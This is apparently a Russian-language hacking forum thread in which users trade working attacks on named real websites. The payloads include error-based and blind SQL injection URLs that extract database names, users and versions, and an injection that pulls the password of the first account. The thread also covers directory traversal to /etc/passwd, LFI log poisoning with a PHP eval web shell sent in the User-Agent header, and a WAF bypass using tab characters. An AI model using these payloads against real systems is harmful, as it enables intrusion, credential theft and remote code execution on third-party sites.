Code: http://www.mamashkam.ru/users/tennisvip/blog/1'and(extractvalue(1,concat(0x3a,concat_ws(0x3a,database(),user(),version()))))and(1)='1--.html XPATH syntax error: ':mama:mama@localhost:5.5.25' UPD В chrome ошибка есть, в Firefox нет, учтите!
я имел ввиду через ерор базед опечатался, с кем не бывает) меня больше интересует, раскрутить как обычную...
Не сочти за трололо - но "как обычную" - это как ?? Охотник предложил тебе полностью рабочий вариант, с максимальной выдачей информации ( не Blind и не Time-Based), а что ещё тебе надо ? Следовать классике - имхо, дурной тон. Это шаблонное мышление, так ты далеко не уйдёшь. Так и останешься работать на старенькой Win95 ? В уязвимостях, как я считаю, нет понятия "обычная". Все они "необычные" - разные и требуют разных методов реализации. А если ты следуешь шаблонам и по-другому не умеешь мыслить и реализовывать, может дальше и не стоит пробовать, а ? З.Ы. для люителей шаблонно мыслить Code: _ttp://www.cellapplications.com/product_desc.php?id=1919'+and+substring((@@version),1,1)='5
Всем привет! Есть вопрос ... Можно раскрутить инклуд в таком коде? PHP: $page = $_GET['page']; $page = preg_replace('/[\x80-\xFF]/', '?', $page); $page = trim(htmlspecialchars(str_replace(array("\r\n", "\r", "\0"), array("\n", "\n", ''), $page), ENT_QUOTES, 'UTF-8')); $pageClass = 'Show'.ucwords($page).'Page'; if(!file_exists('test/class.'.$pageClass.'.php')) { exit('error'); } // Added Autoload in feature Versions require('test/class.'.$pageClass.'.php'); П.с волнует вопрос если можно обрезать то что идёт ДО переменной
Жирным подсвечены поля, которые приходят из формы и не фильтруются. Что можно выполнить при таком раскладе?
Ну к примеру я знаю основные поля и таблицы другие, хочу к примеру отправить самому себе в сообщении пароль от первого idшника...
http://www.mysql.ru/docs/man/SELECT.html INSERT INTO table1 (user_from,user_to,message,edittime) VALUES('10','10',(Select `pass` From `user` WHERE id=1),'1347608937')+--+#user_to,message,edittime) VALUES('10','10','mess','1347608937')
Здравствуйте нашел Directory Traversal http://site.ru/download.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - файл отлично выводиться, что делать дальше? Что можно из этого извлеч? Ранчше с этим не сталкивался
Вопервых можешь поискать логи ошибок, спровацировать ошибку вставив в нее свой пхп код и проинклудить, во вторых если проинклудидится такая херь /proc/self/environ, то можешь также в хидерах отправить запрос с уже твоим пхп кодом, например в название браузера.
/proc/self/environ не инклудится, какие есть еще варианты? И Как найти логи ошибок? (напиши в личку аську)
Брутом по списку наиболее распространенных вариантов. Если сайт на хостинге, читаешь инструкции и факи хостера или регаешь там же свой сайт, чтобы узнать стандартные имена лог-файлов.
Есть сайт LFI, логи Apache не нашел. Решил поискать в /proc. Вспомнил, что путь до логов знать не обязательно, а можно залится через символическую ссылку к этим самым логам, но надо знать идентификатор процесса и ярлык соответствующему файлу. Соответственно полез я в /proc/self/status: Code: Name: apache State: R (running) SleepAVG: 97% Tgid: 28857 Pid: [B]28857[/B] PPid: 7349 TracerPid: 0 Uid: 65534 65534 65534 65534 Gid: 65534 65534 65534 65534 FDSize: 32 Groups: 65534 VmSize: 19128 kB VmLck: 0 kB VmRSS: 8676 kB VmData: 2440 kB VmStk: 84 kB VmExe: 488 kB VmLib: 13636 kB VmPTE: 24 kB Threads: 1 SigQ: 0/2048 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000080000000 SigIgn: 0000000000001200 SigCgt: 00000003844064eb CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 Вижу PID: 28857. Пытаюсь залится: http://ozrics.dyndns.info/modules/page.php?id=../../../proc/28857/fd/2&cmd=phpinfo(); В этот момент у меня уже стоит user-agent: <?php eval(\$_GET[cmd]); ?> Что делаю не так?
попробуй сначала вывести phpinfo() из user-agent минуя get переменную, возможно что-то напутал с PID.
помогите докрутить блинд скулю.. сама уязвимость написал скриптик (код позаимствовал из тэмпера) для версии и текучей БД: MS SQL 2005 и база 'InformatoreAgrario' терь хочу выбрать таблицы в текщей базе, но почему-то не получается =/ havji на эту багу вообще никак не реагирует, видимо работать с OR ее не научили
Pangolin PRO отлично справляется с MSSQL инъекциями. Version = Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86) Dec 10 2010 10:56:29 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) User = webuser Database = InformatoreAgrario Но в твоём случае извлечению табличек мешает WAF. Code: http://www.informatoreagrario.it/clickthrough.asp?IDbanner=244%09and%09(select%09len(cast(count(1)%09as%09varchar(10)))%09from%09[informatoreagrario]..[sysobjects]%09where%09xtype=char(85)%09and%09status>0)>88%09and%091<2 %09 в нашем случае аналог пробела
Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в /var/www/htdocs/images/ ?
